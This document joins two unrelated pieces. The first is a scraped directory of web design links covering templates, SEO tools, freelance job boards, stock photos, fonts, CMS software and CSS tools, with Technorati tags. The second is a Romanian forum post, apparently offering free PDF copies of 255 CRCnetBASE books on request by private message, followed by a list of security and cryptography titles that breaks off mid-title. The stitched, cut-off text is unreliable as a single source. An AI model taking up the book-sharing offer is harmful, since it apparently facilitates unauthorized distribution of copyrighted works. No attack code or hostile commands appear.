Webmaster Edge WEB DESIGN / GRAPHIC DESIGN FORUMS http://www.allgraphicdesign.com/phpBB2/ Graphic Design Forums http://www.openwebdesign.org/forum/ Open Web Design Forum http://www.webmasterworld.com/ WebmasterWorld http://www.webdevforums.com/ Web Dev Forum http://www.webdesignforum.com/ Web Design Forum http://webdesignforums.net/ Web Design Forums http://www.graphicdesignforum.com/ Graphic Design Forum http://www.graphic-design-forum.com/ Graphic-Design-Forum http://www.steeldolphin-forums.com/ Steel Dolphin Forum FREE TEMPLATES SITES AND DESIGN http://mashable.com/2007/09/29/2-column-website-templates/ 80 Free 2 Column Templates – Mashable http://mashable.com/2007/09/13/one-column-website-templates/ 40 Free 1 Column Templates – Mashable http://mashable.com/2007/10/11/free-3-column-web-templates/ 30 Free 3 Column Templates – Mashable http://www.101webtemplate.com/ 101WebTemplates http://www.adesdesign.net/php/templates.php Ades Design http://gerlinda.com/templates.shtml All-in-one Website Templates and hosting packages http://templates.arcsin.se/ CSS Design Templates http://www.designload.net/ Design Load http://www.htmlcenter.com/tutorials/tutorials.cfm/64 Dreamweaver Templates Tutorial http://www.elated.com/pagekits/ Elated Web Page Kits (Templates) http://mitchbryson.com/css-templates/ Free Basic CSS Templates http://www.freelayouts.com/ Free Layouts http://freesitetemplates.com/ Free Site Templates http://www.templatemuseum.com/ Free Templates & Web Designing http://www.freewebtemplates.com/ Free Web Templates http://www.freewebsitetemplates.com/ Free Web Site Templates http://www.graphic-templates.com/ Graphic Templates http://web.thenetter.com/ TheNetter.com Web Design http://www.mycelly.com/ MyCelly Free CSS Templates http://myfreetemplatehome.com/ My Free Template Home http://www.opendesigns.org/ Open Design Community http://www.oswd.org/ Opensource Web Design Templates http://www.opensourcetemplates.org/ Opensource Templates http://www.smartwebby.com/website_templates/default.asp Professional Dreamweaver Templates http://www.studio7designs.com/open_source_templates.cfm Studio 7 Opensource Templates http://www.templatehunter.com/ Template Hunter http://www.templatesbox.com/ Templates Box http://templates2go.com/ Templates to Go http://www.templateyes.com/ Template Eyes http://www.templates-themes-graphics.com/ Templates Theme Graphics http://www.templatemonster.com/ Template Monster http://www.templateworld.com/free_templates.html Template World http://www.webpagedesign.com.au/ Web Page Design Templates AU http://www.zeroweb.org/ Zero Web WEB DESIGN INSPIRATIONAL SITES http://brandsoftheworld.com/ Brands of the World http://www.dotcomlogotypes.com/main/main.php Dot Com Logotypes http://www.123-logo-logos.com/logo-designs.htm How to Design a Logo http://logotypes.designer.am/ Free LogoTypes http://www.goodlogo.com/ Good Logo http://gopromos.com/idea_center/stock_art_alpha.asp Go Promos http://www.logoed.fsnet.co.uk/index2.html Logoed http://www.ideabook.com/progress.htm Logo in Process http://logomarket.com/ Logomarket.com http://www.logotypes.ru/ Logotypes Russia http://www.basa.md/logo/ LogoTypes from Maldolva http://www.logotypes.lv/ Logotypes http://www.satlogo.com/ Satlogo.com http://www.sportlogo.net/ Sport Logos WEB SITE RATINGS & INFORMATION http://www.alexa.com/ Alexa http://blogoscoped.com/rank/ Any Rank http://blogoscoped.com/archive/2005-01-29-n34.html Blogoscoped http://www.golexa.com/ GoLexa Google Toolbar for Firefox – Google Toolbar Google Toolbar http://greatdb.com/ GreatDB http://www.rankquest.com/download-toolbar.html RankQuest Toolbar http://www.seo-browser.com/ SEO Browser http://tools.seobook.com/firefox/seo-for-firefox.html SEO Open for Firefox http://tools.seobook.com/firefox/seo-for-firefox.html SEO Toolbar for Firefox http://www.seotoolset.com/tools/toolbar.html SEO Toolbar http://www.wmtips.com/tools/info/ Site Information http://www.toolbarbrowser.com/ Toolbar Browser http://www.urltrends.com/ URL Trends http://www.websitegrader.com/ WebSite Grader KEYWORDS TOOLS FOR SEO http://www.goodkeywords.com/ Good Keywords https://adwords.google.com/select/KeywordToolExternal Google Adwords Keyword External Tool Google Trends Google Trends http://freekeywords.wordtracker.com/ Free Keyword Suggestion Tool http://www.keyworddiscovery.com/ Keyword Discovery http://www.digitalpoint.com/tools/suggestion/ Digital Point Keyword Suggestion Tool http://developers.evrsoft.com/seotool/ SEO Keyword Optimization Tool http://www.wordze.com/ Wordze SEARCH ENGINE OPTIMIZATION / SEO SITES http://www.thirtydaychallenge.com/ 30 Day Challenge http://www.seocompany.ca/tool/seo-tools.html 136 SEO Tools http://www.robotstxt.org/wc/active/html/ Database of Web Robots http://www.modernlifeisrubbish.co.uk/article/click-survey-heatmap-analysis Click Survey Analysis & Heatmap http://www.vaughns-1-pagers.com/internet/google-ranking-factors.htm Google Ranking Factors http://www.jimwestergren.com/link-bait/ Link Bait http://www.mattcutts.com/blog/ Matt Cutts http://www.highrankings.com/forum/ Search Engine Optimization Forum http://searchenginewatch.com/ Search Engine Watch http://www.seobook.com/ SEO Book http://www.seoegghead.com/blog/seo/mattcuttsarama-a-summary-of-useful-stuff-matt-cutts-has-said-p112.html SEO Egghead http://www.seomoz.org/ SEOMoz http://www.seroundtable.com/ SEO Roundtable http://www.webmasterworld.com/ Webmasters World WEB DESIGN INSPIRATION AND WEB DESIGN IDEAS http://www.thebestdesigns.com/ Best Designs http://www.brainfuel.tv/ Brain Fuel http://www.coolestdesigns.com/ Coolest Designs http://www.coolhomepages.com/ Cool Home Pages http://www.digitalrefueler.com/ Digital Refueler http://www.digitalthread.com/vintage/ Digital Thread http://www.thedreamer.com.br/ Dreamer http://www.internettinyawards.com/ Internet TINY Awards http://www.misspato.com/ Misspato http://www.moluv.com/ Moluv http://www.newstoday.com/ Newstoday http://nofound.com/home/ No Found http://www.nolimitmedia.com/ No Limit Media http://www.plasticpilots.com/ Plastic Pilots http://www.visualdesigner.net/home/ Visual Designer FREELANCE WEB DESIGN JOBS http://www.allfreelancework.com/ All Freelance Work (non bidding jobboard so cuts down on foreign competition) http://www.contractedwork.com/ Contracted Work http://www.elance.com/ Elance http://www.12freelance.com/ 12Freelance http://gigs.37signals.com/ 37 Signals http://www.agaveblue.net/ Agave Blue http://www.aquent.com/ Aquent (recruiting agency for freelancers) http://www.adveres.com/ Adveres http://authenticjobs.com/ Authenic Jobs http://www.bid-job.com/ Bid-Job http://www.bidradar.com/ Bid Radar http://www.careerbuds.com/ CareerBuds http://www.craigslist.org/ CraigsList http://www.ework.com/ eWork http://www.facebook.com/ FaceBook http://www.freelanceauctionnetwork.com/ Freelance Auction Network http://www.freelancebank.com/ Freelance Bank http://www.freelancebbs.com/ Freelance BBS http://www.freelancecenter.com/ Freelance Center http://www.freelancers.net/ Freelancers.net http://www.thefreelancehub.com/ Freelance Hub http://www.freelancejobsearch.com/ Freelance Job Search http://www.freelancejobs.org/ FreelanceJobs.Org http://www.freelancejobspost.com/ Freelance Jobs Post http://www.freelance-work.net/ Freelance-Work http://www.freelance.com/ Freelance.com http://www.freelancegroups.com/ Freelance Groups (For Christians) http://www.freelancemom.com/gigs.htm Freelance Mom http://www.freelanceireland.ie/ Freelance Ireland http://www.freelanceindia.com/ Freelance India http://www.freelancequotes.com/ Freelance Quotes http://www.freelanceq.com/ FreelanceQ http://jobsandgigs.com/ Jobs and Gigs http://www.linkedin.com/ LinkedIn http://www.noagenciesplease.com/ No Agencies Please http://www.odesk.com/ ODesk http://www.project4hire.com/ Project4Hire http://www.smarterwork.com/ Smarterwork http://www.sologig.com/ SoloGig http://www.thecentralmall.com/index.html The Central Mall http://www.totalfreelance.com/ Total Freelance http://www.trally.com/ Trally (translation jobs) http://www.woompa.com/ Woompa http://www.workatnight.com/ Work at Night WEB DESIGN SPECIFIC FREELANCE SITES http://cgilance.com/main.html CGI Lance http://www.cityitjobs.net/ City IT Jobs http://www.codelance.com/ Code Lance http://www.coderforrent.com/ Coder for Rent http://www.coroflot.com/ Coroflot (Designers) http://www.coswap.com/ Creative Freelance Web Designer Marketplace http://www.designquote.net/ Design Quote: Where web designers and web design projects meets. http://www.developreneurs.com/ Developreneurs http://www.developerbids.com/ Developer Bids http://www.devbistro.com/ Dev Bistro http://www.e-globalsolutions.com/ e-Global Solutions http://www.freelanceauction.com/ Freelance Auction http://www.freelancecentral.net/ Freelance Central http://www.freelancedesigners.com/ Freelance Designers http://www.freelancewebprojects.com/ Freelance Web Projects http://freelanceseek.com/ Freelance Seek http://jobs.freelanceswitch.com/ Freelance Switch http://devbistro.com/index.jsp Freelance Web Developer http://www.freelancewebprogramming.com/ Freelance Web Programming http://www.freshwebjobs.com/ Fresh Web Jobs http://jobs.gawker.com/newmediajobs Gawker Internet / New Media Jobs http://www.geekbidder.com/ Geek Bidder http://www.getafreelancer.com/ Get a Freelancer http://www.gurulance.com/ GuruLance http://www.hirecoders.com/ Hire Coders http://www.artypapers.com/jobpile/ Job Pile http://www.krop.com/ Krop (creative and tech jobs) http://www.listbid.com/ List Bid http://www.nyfreelancers.com/ NY Freelancers http://www.outsourcetoday.net/ Outsource Today http://www.oslance.com/ OsLance http://www.php-freelancers.com/ PHP Freelancers http://www.phpquote.net/ PHP Quote http://www.planetrecruit.com/ Planet Recruit http://www.projectspool.com/ Project Pool http://www.projectspring.com/freelance/index.html ProjectSpring http://rfq.programmingbids.com/ Programming Bids http://www.programmingoutpost.com/ Programming Outpost http://www.project4hire.com/ Project4Hire http://www.projectsimple.com/ Project Simple http://www.freelancefree.com/ Freelance Free http://r144.com/workshop.htm Freelance Job News http://www.freelanceyourproject.com/ Freelance Your Project http://www.guru.com/ Guru.com http://www.hirebid.com/ HireBid http://www.ifreelance.com/ iFreelance http://www.joomlafreelance.co.uk/ Joomla Jobs http://www.joomlancers.com/ Joomlancers http://www.lancesite.com/ Lance Site http://ct.monster.com/ Monster (Monster has a Contract and Temporary Work section) http://www.noagenciesplease.com/ No Agencies Please http://www.freelancedirectory.org/ NUJ Freelance Direct http://www.projectlance.com/ ProjectLance http://www.prosavvy.com/ ProSavvy http://www.rentacoder.com/RentACoder/default.asp Rentacoder http://www.scriptalliance.com/ Script Alliance http://www.scripthelpers.com/ Script Helpers http://www.scriptplaza.com/ Script Plaza http://www.snaplance.com/ SnapLance http://www.sologig.com/ Sologig http://www.supportuniverse.com/ Support Universe http://www.templatelance.com/ TemplateLance http://www.webprojobs.com/ Web Pro Jobs http://www.webwalas.com/ Web Walas FREE STOCK PHOTOGRAPHY SITES http://www.amgmedia.com/freephotos/ AMG Media http://www.artfavor.com/ Art Favor http://www.ars.usda.gov/is/graphics/photos/ ARS Image Gallery http://amazingtextures.com/textures/index.php Amazing Textures http://www.burningwell.org/ Burning Well http://www.bigfoto.com/ Big Foto http://www.buzznet.com/ Buzz Net http://www.barrysfreephotos.com/ Barry’s Free Photos – Free Stock Photos http://www.creatingonline.com/stock_photos/ Creating Online http://www.cepolina.com/freephoto/ Cepolina http://search.creativecommons.org/ Creative Commons Search http://gimp-savvy.com/PHOTO-ARCHIVE/ Copyright Free Photo Archive http://gallery.hd.org/index.jsp DHD Multimedia Gallery http://www.free-photographs.net/ Free Photographs http://www.freedigitalphotos.net/ Free Digital Photos http://www.freeimages.co.uk/ Free Images and Stock Photos http://www.freephotos.com/ Free Photos Dot Com http://www.freephotosbank.com/ Free Photos Bank http://free-stockphotos.com/ Free Stock Photos Dot Com http://www.freemediagoo.com/ Free Media Goo http://geekphilosopher.com/MainPage/photos.htm GeekPhilosopher http://freestockphotos.com/ Free Stock Photos http://www.freefoto.com/index.jsp Free Foto http://fromoldbooks.org/ From Old Books http://www.holylandphotos.org/ Holy Land Photos http://davidniblack.com/imagebase/ Image Base http://www.imageafter.com/ Image After http://build.tripod.lycos.com/imagebrowser/photos/index.html Lycos Image Gallery http://www.morguefile.com/ Morgue File http://majesticimagery.com/ Majestic Imagery http://www.pics4learning.com/ Pics4Learning http://www.pixelperfectdigital.com/ Pixel Perfect Digital http://pdphoto.org/ PD Photo http://www.photorogue.com/ Photo Rogue http://www.pixelbag.de/ PixelBag http://www.photocase.com/ PhotoCase http://www.picturestation.net/start/ Picture Station http://www.piotrpix.info/ Piotr.Pix http://www.sxc.hu/ Stock Xchng http://www.stockvault.net/ Stock Vault http://www.unprofound.com/ UnProfound http://www.visipix.com/index_hidden.htm Visipix http://www.woophy.com/ Woophy http://www.nps.gov/yell/press/images/ Yellowstone National Park http://yotophoto.com/ YotoPhoto http://www.nwyhstockimages.com/ NWYH Stock Image Library http://www.openphoto.net/ Open Photo http://stockcache.com/gallery/ Stockcache Gallery http://www.vintagepixels.com/ Vintage Pixels http://commons.wikimedia.org/ Wikimedia http://wallpaperstock.com/ Wallpaper Stock PORTFOLIO SITES http://www.allfreelancework.com/ AllFreelanceWork.com http://altpick.com/ AltPick.com http://www.deviantart.com/ DeviantArt http://www.graphicdesigncommunity.com/ Graphic Design Community http://www.portfolios.com/ Portfolios.com DESIGN MAGAZINES http://www.arkitip.com/ Arkitip http://www.pagelab.com/ Before & After http://www.digital-web.com/ Digital Web http://www.bigmagazine.com/home.htm Big Magazine http://coupe-mag.com/ Coupe Mag http://www.digitaloutput.net/ Digital Output http://www.graphis.com/ Graphis http://www.alistapart.com/ A List Apart http://www.pagelab.com/ Before & After http://www.bornmag.com/ Born Magazine http://www.brigataitalia.com/ Brigata http://www.creativebehavior.com/ Creative Behavior http://www.creativebusiness.com/newsletter.lasso Creative Business Newsletter http://www.delvemagazine.com/ Delve Magazine http://www.digitaloutput.net/ Digital Output http://digitalproducer.digitalmedianet.com/ Digital Producer Magazine http://venturalady.com/html/vuepoint.html VUEPOINT Magazine (On Amazon.com) Titles .net : The Internet Magazine Inside Web Design How Magazine Communication Arts Dynamic Graphics Magazine Layers Magazine Computer Arts C-W Computer Arts Projects Computer Graphics World Digital Arts Magazine Eye – International Review of Graphic Design Step Inside Design Magazine Graphic Communications World Graphic Design – USA Graphic Design Journal I.D. Magazine Novum : World of Graphic Design Digital Graphics Magazine Graphic Arts Monthly Magazine Grafik Professional Magazine Inside Adobe Indesign Magazine / Journal Trade Pub Digital Media World Advanced Photoshop Inside Photoshop Magazine Photoshop Creative Magazine Photoshop Elements Techniques Magazine Better Photoshop Techniques Magazine Grafik Student Magazine DESIGN MAGAZINES ONLINE http://www.gxo.com/ Graphic Exchange http://www.graphis.com/ Graphis http://www.netdiver.net/ Net Diver http://www.fontsite.com/ FontSite http://www.pingmag.jp/ Pink Mag http://www.guuui.com/ GUUUI FREE FONTS SITES http://new.myfonts.com/WhatTheFont/ WhatTheFont http://www.1001freefonts.com/ 1001 Free Fonts http://www.1001fonts.com/ 1001 Fonts http://www.2200freefonts.com/ 2200 Free Fonts http://www.1archive.com/ 1 Archive Fonts http://www.4yeo.com/freefonts/index.htm 4Yeo http://www.a1fonts.com/html/Letter_A,0.htm A1 Fonts http://desktoppub.about.com/od/freefonts/ About.com Free Fonts http://www.abstractfonts.com/ Abstract Fonts http://www.abcwebworx.com/fonts/ ABCWebWorx http://www.grsites.com/fonts/ Absolute Fonts Archive http://www.graphicsngraphicdesign.com/hugelistfreefontssites Huge list of free fonts here…. TUTORIALS SITES http://www.tutorialselect.com/ Tutorials Select http://www.pixel2life.com/ Pixel2Life http://www.goodtutorials.com/ Good Tutorials http://www.totaltutorial.com/ Total Tutorials http://www.tutorialoutpost.com Tutorial Outpost http://www.tutorialquest.com/ Tutorial Quest http://www.w3schools.com/ W3 Schools BLOG HOSTS AND SERVICES https://www.blogger.com/start Blogger http://www.livejournal.com/ LiveJournal http://multiply.com/ Multiply http://www.opendiary.com/ Open Diary http://www.squidoo.com/ Squidoo http://www.tumblr.com/ Tumblr http://twitter.com/ Twitter http://www.typepad.com/ TypePad http://wordpress.com/ WordPress COMMUNITY / CMS SOFTWARE http://www.drupal.org/ Drupal http://elgg.org/ Elgg http://www.joomla.org/ Joomla http://www.mamboserver.com/ Mambo http://radiantcms.org/ Radiant CMS http://typo3.org/ Typo 3 http://www.boonex.com/products/dolphin/ Boonex Dolphin FORUM / MESSAGE BOARD SOFTWARE http://www.phpbb.com/ PHPBB http://www.invisionpower.com/ Invision Power http://www.simplemachines.org/ Simple Machines http://forum.snitz.com/default.asp Snitz http://www.phorum.org/ Phorum http://www.punbb.org/ PunBB http://www.webwizguide.info/web_wiz_forums/default.asp WebWiz http://www.wowbb.com/ WowBB http://www.ubbcentral.com/ UBB http://getvanilla.com/ Vanilla http://www.vbulletin.com/ VBulletin WEB DESIGN BLOGS http://www.allwebdesignresources.com/webdesignblogs/ Web Design Resources Blog http://www.456bereastreet.com/ 456 Berea Street http://www.andybudd.com/ Andy Budd http://www.alistapart.com/ A List Apart http://andreasviklund.com/ Andreas Vilkund http://www.bartelme.at/journal/ Bartelme Design http://bittbox.com/ Bitt Box http://www.briangardner.com/ Brian Gardner http://www.cssbeauty.com/ CSS Beauty http://fadtastic.net/ Fadtastic http://www.allgraphicdesign.com/graphicsblog/ Graphic Design & Graphics News Blog http://meyerweb.com/ Meyer Web http://www.pearsonified.com/ Pearsonified http://www.snook.ca/jonathan/ Snook http://www.simplebits.com/ Simple Bits http://www.sitepoint.com/blogs/category/design/ SitePoint http://www.smashingmagazine.com/ Smashing Magazine http://theundersigned.net/ Undersigned http://www.thinkvitamin.com/ Vitamin http://warpspire.com/ Warpspire http://www.webdesignerwall.com/ Web Designer Wall WEB HOSTING REVIEWS AND DIRECTORIES http://www.filehostingreview.com/ File Hosting Review http://www.webhostingjury.com/ Web Hosting Jury http://www.webhostingunleashed.com/ Web Hosting Unleashed http://www.hostindex.com/web/hostexcellence/host_excellence_reviews.shtm Host Excellence http://www.reviewwebhosts.com/ Review Web Hosts http://www.powerreviews.com/ Power Reviews http://www.websitehostingreviews.com/ Web Site Hosting Reviews ADVERTISING https://www.google.com/adsense/ Google Adsense http://www.adbrite.com/ AdBrite http://www.adengage.com/ Adengage http://www.bidclix.com/ BidClix http://www.bidvertiser.com/ Bidvertiser http://www.clicksor.com/ Clicksor http://www.text-link-ads.com/ Commission Junction http://www.compactads.com/ Compact Ads http://www.interclick.com/ InterClick http://www.kontera.com/ Kontera http://kanoodle.com/ Kanoodle http://partnerweekly.com/ Partner Weekly http://www.peakclick.com/ PeakClick http://www.text-link-ads.com/ TextLinkAds http://www.valueclick.com/ ValueClick http://publisher.yahoo.com/ Yahoo Publisher WEB DESIGN / DEVELOPMENT LIBRARIES http://weblogs.asp.net/mschwarz/archive/2005/04/07/397504.aspx AJAX http://redredmusic.com/brendon/ajform/ AJForm http://www.ajaxgear.com/ Ajax Gear https://developer.berlios.de/projects/bajax/ Bajax http://bennolan.com/behaviour/ Behaviour http://www.colorcombos.com/combolibrary.html Color Combos http://cpaint.booleansystems.com/ CPaint http://www.cross-browser.com/toys/ Cross Browser Toys http://www.dhtmlgoodies.com/ DHTML Libraries http://www.dojotoolkit.org/ Dojo http://www.youngpup.net/2001/domdrag/ DOM Drag http://www.walterzorn.com/dragdrop/dragdrop_e.htm Drag and Drop http://www.dynamicdrive.com/style/ Dynamic Drive CSS Library http://www.imnmotion.com/projects/engine/ Engine http://www.walterzorn.com/jsgraphics/jsgraphics_e.htm Javascript Vector Graphics http://www.mochikit.com/ Mochikit http://moofx.mad4milk.net/ Moo.FX http://www.bosrup.com/web/overlib/ OverLib http://pear.php.net/ Pear http://www.plextk.org/ Plex Toolkit http://prototype.conio.net/ Prototype http://qooxdoo.oss.schlund.de/ Qooxdoo http://openrico.org/rico/home.page Rico http://twilightuniverse.com/projects/sack/ Sack http://sarissa.sourceforge.net/doc/ Sarissa http://script.aculo.us/ Script.aculo.us http://sourceforge.net/projects/solvent/ Solvent http://swat.silverorange.com/Swat Swat http://www.technicalpursuit.com/ajax.htm Tibet http://www.dotvoid.com/view.php?id=40 Toxic http://developer.yahoo.com/yui/ Yahoo UI Library http://www.zimbra.com/ Zimbra TOP CSS TOOLS blueprintcss - Blueprint: A CSS Framework - Google Project Hosting BluePrint CSS http://www.somacon.com/p334.php CSS Fonts and Text Library Tool http://www.dynamicdrive.com/style/ Dynamic Drive CSS Library http://www.cssdrive.com/index.php/main/csscompressor/ CSS Compression http://www.cssoptimiser.com/ CSS Optimizer http://csstidy.sourceforge.net/index.php CSS Tidy http://www.csscreator.com/version2/pagelayout.php CSS Creator http://riddle.pl/emcalc/ CSS Pixel Font Sizes Tool http://www.accessify.com/tools-and-wizards/accessibility-tools/form-builder/ CSS Accessible Form Builder Tool http://www.maketemplate.com/form/ CSS Form Code Maker http://www.neuroticweb.com/recursos/css-rounded-box/ CSS Rounded Box Generator http://www.collylogic.com/scripts/rollover.html CSS Rollover Generator http://typetester.maratz.com/ CSS Typetester http://www.sitevista.com/cssvista/ CSS Vista http://www.highdots.com/css-list/index.php HightDots Tabs CSS Generator http://www.redalt.com/Tools/ilyc.php I Like Your Colors from Redalt http://www.korhoen.net/css_typeviewer.html Korhoen CSS Typeviewer http://www.maketemplate.com/ Make Template CSS Tool http://www.accessify.com/tools-and-wizards/developer-tools/list-o-matic/ Navigational CSS Menu Generator http://www.positioniseverything.net/articles/pie-maker/pagemaker_form.php Position Is Everything http://www.iconico.com/CSSScrollbar/ Scrollbar Color Changer http://www.s5easy.com/ Slideshow Creator http://www.scriptomizers.com/css/stylesheet_generator Stylesheet Generator http://www.wannabegirl.org/firdamatic/ Tableless Layout Generator http://www.ibdjohn.com/csstemplate/ Template Code Generator Technorati Tags: http://technorati.com/tag/web+design+tools web design tools http://technorati.com/tag/design+tools design tools http://technorati.com/tag/web+design+resources web design resources http://technorati.com/tag/top+web+design+tools top web design tools http://technorati.com/tag/top+web+design+resources top web design resources http://technorati.com/tag/css css http://technorati.com/tag/colors colors http://technorati.com/tag/toolkit toolkit http://technorati.com/tag/tools tools http://technorati.com/tag/templates templates http://technorati.com/tag/free+templates free templates http://technorati.com/tag/css+tools css tools http://technorati.com/tag/color+pickers color pickers http://technorati.com/tag/color+choosers color choosers http://technorati.com/tag/css+resources css resources http://technorati.com/tag/web+design+forums web design forums http://technorati.com/tag/design+forums design forums http://technorati.com/tag/cms+software cms software http://technorati.com/tag/free+photos free photos http://technorati.com/tag/free+photographs free photographs http://technorati.com/tag/free+images free images http://technorati.com/tag/free+fonts free fonts http://technorati.com/tag/list+of+fonts list of fonts http://technorati.com/tag/inspiration+sites inspiration sites http://technorati.com/tag/web+design+inspiration web design inspiration http://technorati.com/tag/seo+tools seo tools http://technorati.com/tag/search+engine+optimization+tools search engine optimization tools http://technorati.com/tag/seo seo http://technorati.com/tag/search+engine+optimization search engine optimization http://technorati.com/tag/web+design+jobs web design jobs http://technorati.com/tag/job+sites job sites http://technorati.com/tag/freelance+job+sites freelance job sites http://technorati.com/tag/freelance+job+boards freelance job boards http://technorati.com/tag/portfolio+sites portfolio sites http://technorati.com/tag/free+portfolios free portfolios http://technorati.com/tag/stock+photograph stock photograph http://technorati.com/tag/blog+hosts blog hosts http://technorati.com/tag/blog+services blog services http://technorati.com/tag/server+review+sites server review sites http://technorati.com/tag/host+review+sites host review sites http://technorati.com/tag/web+design+directories web design directories http://technorati.com/tag/design+directories design directories

Pentru cei carora le place sa citeasca, si se descurca cu engleza, ofer gratuit capitole sau urmatoarele (255) carti intregi in format PDF de pe CRCnetBASE, majoritatea nu pot fi gasite pe torrente sau site-uri de ebooks grauite. Din anumite motive bine intemeiate, imi rezerv dreptul de a trimite aceste carti doar anumitor persoane. Tinand cont ca e un proces manual si trebuie sa imi iau niste masuri de siguranta, e posibil sa dureze ceva daca doriti multe carti sau am un backlog de cereri. Pentru a vedea un rezumat/abstract al cartii inainte sa o cereti, si pentru a salva timpul meu si al vostru, recomand mai intai sa dati un search pe pagina aceasta la titlul cartii in acest field si in dreapta va aparea un pdf gratuit cu rezumatul/abstractul/contents: Cererile doar prin mesaj privat, aici doar intrebari/nelamuriri/probleme va rog. Thx. UPDATE: Va rog pentru inceput sa cereti doar cate putin, cat cititi odata, nu la gramada tot ce pare fain, ca sa pot servi pe toata lumea. Cand terminati mai trimit - nu plec niciunde. Thx. Lista completa a cartilor: 802.1X Port-Based Authentication A Practical Guide to Security Assessments A Practical Guide to Security Engineering and Information Assurance A Technical Guide to IPSec Virtual Private Networks Adaptive Security Management Architecture Advances in Biometrics for Secure Human Authentication and Recognition Algebraic and Stochastic Coding Theory Algebraic Curves in Cryptography Algorithmic Cryptanalysis An Introduction to Cryptography, Second Edition Android Malware and Analysis Android Security, Attacks and Defenses Anonymous Communication Networks, Protecting Privacy on the Web Architecting Secure Software Systems Assessing and Managing Security Risk in IT Systems, A Structured Methodology Asset Protection and Security Management Handbook Asset Protection through Security Awareness Audit and Trace Log Management, Consolidation and Analysis Authentication Codes and Combinatorial Designs Automatic Defense Against Zero-day Polymorphic Worms in Communication Networks Building A Global Information Assurance Program Building an Effective Information Security Policy Architecture Building an Information Security Awareness Program Building and Implementing a Security Certification and Accreditation Program, OFFICIAL (ISC)2 GUIDE to the CAPcm CBK Business Resumption Planning Call Center Continuity Planning Case Studies in Intelligent Computing, Achievements and Trends Case Studies in Secure Computing, Achievements and Trends CISO Soft Skills, Securing Organizations Impaired by Employee Politics, Apathy, and Intolerant Perspectives CISO's Guide to Penetration Testing, A Framework to Plan, Manage, and Maximize Benefits Complete Book of Remote Access, Connectivity and Security Complete Guide to CISM Certification Complete Guide to Security and Privacy Metrics, Measuring Regulatory Compliance, Operational Resilience, and ROI Computer Security Literacy, Staying Safe in a Digital World Conducting Network Penetration and Espionage in a Global Environment Conflict and Cooperation in Cyberspace, The Challenge to National Security Core Software Security, Security at the Source Critical Incident Management Critical Infrastructure System Security and Resiliency Critical Infrastructure, Understanding Its Component Parts, Vulnerabilities, Operating Risks, and Interdependencies Cryptanalysis of RSA and Its Variants Cultural Property Security, Protecting Museums, Historic Sites, Archives, and Libraries Curing the Patch Management Headache Cyber Crime Investigator's Field Guide, Second Edition Cyber Forensics, A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes Cyber Forensics, A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes, Second Edition Cyber Fraud, Tactics, Techniques and Procedures Cyber Power, Crime, Conflict and Security in Cyberspace Cyber Security Essentials Cybersecurity for Industrial Control Systems, SCADA, DCS, PLC, HMI, and SIS Cybersecurity, Public Sector Threats and Responses Cybervetting, Internet Searches for Vetting, Investigations, and Open-Source Intelligence, Second Edition Data Governance, Creating Value from Information Assets Data Mining and Machine Learning in Cybersecurity Data Mining Tools for Malware Detection Data Privacy for the Smart Grid Data Protection, Governance, Risk Management, and Compliance Database and Applications Security, Integrating Information Security and Data Management Data-driven Block Ciphers for Fast Telecommunication Systems Defense against the Black Arts, How Hackers Do What They Do and How to Protect against It Developing and Securing the Cloud Digital Forensics for Handheld Devices Digital Privacy, Theory, Technologies, and Practices Discrete Dynamical Systems and Chaotic Machines, Theory and Applications Disruptive Security Technologies with Mobile Code and Peer-to-Peer Networks Distributed Networks, Intelligence, Security, and Applications Effective Surveillance for Homeland Security, Balancing Technology and Social Issues Effective Use of Teams for IT Audits Elliptic Curves, Number Theory and Cryptography, Second Edition Group Theoretic Cryptography Handbook of Applied Cryptography Handbook of Elliptic and Hyperelliptic Curve Cryptography Handbook of Financial Cryptography and Security Handbook of Finite Fields Handbook of Surveillance Technologies, Third Edition Hardware Security, Design, Threats, and Safeguards Homeland Security and Private Sector Business, Corporations' Role in Critical Infrastructure Protection Homeland Security Handbook How to Develop and Implement a Security Master Plan Industrial Espionage, Developing a Counterespionage Program Information Assurance Architecture Information Security Architecture, An Integrated Approach to Security in the Organization Information Security Architecture, An Integrated Approach to Security in the Organization, Second Edition Information Security Cost Management Information Security Fundamentals, Second Edition Information Security Governance Simplified, From the Boardroom to the Keyboard Information Security Management Handbook on CD-ROM, 2006 Edition Information Security Management Handbook, Fifth Edition, Volume 3 Information Security Management Handbook, Four Volume Set Information Security Management Handbook, Fourth Edition, Volume 4 Information Security Management Handbook, Sixth Edition Information Security Management Handbook, Sixth Edition, Volume 2 Information Security Management Handbook, Sixth Edition, Volume 3 Information Security Management Handbook, Sixth Edition, Volume 4 Information Security Management Handbook, Sixth Edition, Volume 5 Information Security Management Handbook, Sixth Edition, Volume 6 Information Security Management Handbook, Volume 2 Insider Computer Fraud, An In-depth Framework for Detecting and Defending against Insider IT Attacks Intelligent Network Video, Understanding Modern Video Surveillance Systems Intelligent Video Surveillance, Systems and Technology Investigations in the Workplace, Second Edition Investigator's Guide to Steganography Iris Biometric Model for Secured Network Access IT Auditing and Sarbanes-Oxley Compliance, Key Strategies for Business Improvement IT Security Governance Guidebook with Security Program Metrics on CD-ROM Lattice Basis Reduction, An Introduction to the LLL Algorithm and Its Applications Machine Learning Forensics for Law Enforcement, Security, and Intelligence Malicious Bots, An Inside Look into the Cyber-Criminal Underground of the Internet Managing A Network Vulnerability Assessment Managing an Information Security and Privacy Awareness and Training Program Managing an Information Security and Privacy Awareness and Training Program, Second Edition Managing Risk and Security in Outsourcing IT Services, Onshore, Offshore and the Cloud Managing the Insider Threat, No Dark Corners Managing Trust in Cyberspace Mechanics of User Identification and Authentication, Fundamentals of Identity Management Multilevel Modeling of Secure Systems in QoP-ML Multilevel Security for Relational Databases Multimedia Content Encryption, Techniques and Applications Multimedia Encryption and Authentication Techniques and Applications Multimedia Security Handbook Multimedia Security, Watermarking, Steganography, and Forensics Multimedia Watermarking Techniques and Applications Multiple-Base Number System, Theory and Applications Network and Application Security, Fundamentals and Practices Network Anomaly Detection, A Machine Learning Perspective Network Attacks and Defenses, A Hands-on Approach Network Perimeter Security, Building Defense In-Depth Network Security Technologies New Directions of Modern Cryptography Noiseless Steganography, The Key to Covert Communications Official (ISC)2 Guide to the CISSP CBK Official (ISC)2 Guide to the CISSP CBK, Second Edition Official (ISC)2 Guide to the CISSP CBK, Third Edition Official (ISC)2 Guide to the CISSP Exam Official (ISC)2 Guide to the CSSLP Official (ISC)2 Guide to the CSSLP CBK, Second Edition Official (ISC)2 Guide to the HCISPP CBK Official (ISC)2 Guide to the SSCP CBK Official (ISC)2 